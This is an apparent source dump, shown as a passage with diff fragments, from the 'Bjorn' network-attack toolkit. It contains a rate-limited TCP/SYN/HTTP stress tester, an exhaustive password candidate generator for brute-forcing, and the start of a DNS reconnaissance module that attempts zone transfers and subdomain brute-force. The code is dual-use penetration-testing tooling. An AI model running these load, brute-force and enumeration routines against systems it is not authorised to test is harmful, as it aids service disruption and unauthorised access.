from scapy.all import IP, TCP, sr1, conf as scapy_conf # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce"
b_module = "berserker_force"
b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
b_category = "stress"
b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
b_tags = ["stress", "availability", "resilience"]

b_args = {
"mode": {
"type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
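The helper above times `socket.connect_ex`, which returns 0 on success. A standalone check against a throwaway local listener (ephemeral port, purely illustrative) shows the pattern:

```python
import socket
import time

def tcp_connect_time(ip, port, timeout_s=2.0):
    """Round-trip TCP connect time in seconds, or None on failure."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout_s)
    try:
        t0 = time.monotonic()
        err = sock.connect_ex((ip, int(port)))
        return time.monotonic() - t0 if err == 0 else None
    finally:
        sock.close()

# Listen on an OS-assigned loopback port, then time a connect to it
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))
srv.listen(1)
rt = tcp_connect_time("127.0.0.1", srv.getsockname()[1])
srv.close()
print(rt is not None and rt < 2.0)  # a successful loopback connect yields a small float
```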
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: even a refused connection or error page counts
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except URLError:
return None
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
# -------------------- Main class ----------------------------------------------
class BerserkerForce:
"""Service resilience tester -- orchestrator-compatible Bjorn action."""

def __init__(self, shared_data):
self.shared_data = shared_data

# ------------------------------------------------------------------ #
# Phase helpers #
# ------------------------------------------------------------------ #

def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Gather target ports from the port argument, row data, or DB hosts table."""
ports: List[int] = []

# 1) Explicit port argument
try:
p = int(port) if str(port).strip() else None
if p:
ports.append(p)
except Exception:
pass

# 2) Row data (Ports column, semicolon-separated)
if not ports:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
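Port-string parsing of this shape ("80/tcp" tokens, comma or semicolon separated, de-duplicated, capped) can be sketched in isolation; `parse_ports` is an illustrative name, not part of the module:

```python
def parse_ports(ports_txt: str, cap: int = 20):
    """Parse '80/tcp;443,22' style port strings into a de-duplicated int list."""
    out, seen = [], set()
    for tok in ports_txt.replace(",", ";").split(";"):
        tok = tok.strip().split("/")[0]  # drop '/tcp'-style suffixes
        if tok.isdigit() and int(tok) not in seen:
            seen.add(int(tok))
            out.append(int(tok))
    return out[:cap]

# Mixed separators and a duplicate entry collapse to the first occurrence
print(parse_ports("80/tcp;443/tcp,22;80"))  # → [80, 443, 22]
```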
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
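The stress loop is a plain fixed-interval rate limiter: sleep 1/rate seconds between probes until the deadline passes. The same pattern in isolation (the `probe` callable and function name stand in for the real probe machinery):

```python
import time

def rate_limited_run(probe, duration_s: float, rate: int) -> int:
    """Call probe() at most `rate` times per second for `duration_s` seconds."""
    interval = 1.0 / max(1, rate)
    deadline = time.monotonic() + duration_s
    calls = 0
    while time.monotonic() < deadline:
        probe()
        calls += 1
        time.sleep(interval)  # sleeping at least `interval` bounds the call rate
    return calls

n = rate_limited_run(lambda: None, duration_s=0.5, rate=20)
print(0 < n <= 11)  # roughly duration * rate calls, never more than duration/interval + 1
```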
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
},
"stress": {
"probes_sent": sr["sent"],
"probes_ok": sr["success"],
"probes_fail": sr["fail"],
"mean_rt_s": round(_safe_mean(sr["times"]), 6),
"stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
"max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
"post_baseline": {
"samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
# Overall summary
total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
)

return {
"summary": {
"ports_tested": len(ports),
"total_probes_sent": total_sent,
"total_probes_ok": total_ok,
"total_probes_fail": total_fail,
"avg_degradation_pct": avg_degradation,
},
"per_port": per_port,
}

def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Write the JSON report and return the file path."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as exc:
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")

ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
safe_ip = ip.replace(":", "_").replace(".", "_")
filename = f"{safe_ip}_{ts}.json"
filepath = os.path.join(OUTPUT_DIR, filename)

report = {
"tool": "berserker_force",
"version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so the action reads them
sd.berserker_mode = args.mode
sd.berserker_duration = args.duration
sd.berserker_rate = args.rate
act = BerserkerForce(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
result = act.execute(args.ip, args.port, row, "berserker_force")
print(f"Result: {result}")

View File

@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
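Since Python 3.7+ dicts preserve insertion order, the same first-seen dedupe can be sketched as a one-liner (standalone helper name is illustrative, not part of the module):

```python
def unique_keep_order(items):
    # dict.fromkeys keeps only the first occurrence of each key, in order
    return list(dict.fromkeys(str(x or "") for x in items))
```

Behavior matches the explicit loop above, including coercing None/empty values to "".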
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
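The generation loop above is plain charset exhaustion with a hard cap; a minimal standalone sketch of the same idea (names are illustrative):

```python
import itertools

def bounded_candidates(charset, min_len, max_len, cap):
    # Enumerate charset^n for n in [min_len, max_len], stopping once cap entries exist
    out = []
    for n in range(min_len, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            out.append("".join(tup))
            if len(out) >= cap:
                return out
    return out
```

With a 26-letter lowercase set, lengths 1-4 alone yield 26 + 676 + 17576 + 456976 = 475254 candidates, which is why the cap matters on a Pi Zero.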
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
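The 0.2 s emit throttle in ProgressTracker can be exercised in isolation with a stub standing in for shared_data (a sketch of the same pattern, not the production class):

```python
import threading
import time

class StubShared:
    # Minimal stand-in exposing only the attribute the tracker writes
    bjorn_progress = ""

class MiniTracker:
    # Same idea: emit at most every 0.2 s, but always emit on completion
    def __init__(self, shared, total):
        self.shared = shared
        self.total = max(1, int(total))
        self.attempted = 0
        self._lock = threading.Lock()
        self._last = 0.0
    def advance(self, step=1):
        now = time.time()
        with self._lock:
            self.attempted += max(1, int(step))
            if now - self._last < 0.2 and self.attempted < self.total:
                return
            self._last = now
            self.shared.bjorn_progress = f"{min(100, self.attempted * 100 // self.total)}%"
```

Completion is never throttled because the `attempted < total` guard fails on the final step.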
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)

View File

@@ -1,175 +1,837 @@
"""
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
Performs comprehensive DNS intelligence gathering on discovered hosts:
- Reverse DNS lookup on target IP
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
- Zone transfer (AXFR) attempts against discovered nameservers
- Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os
import json
import socket
import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
# ---------------------------------------------------------------------------
# Graceful import for dnspython (socket fallback if unavailable)
# ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
class DNSPillager:
"""
DNS reconnaissance action for the Bjorn orchestrator.
Performs reverse DNS, record enumeration, zone transfer attempts,
and subdomain brute-force discovery.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as e:
logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
# Thread safety
self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
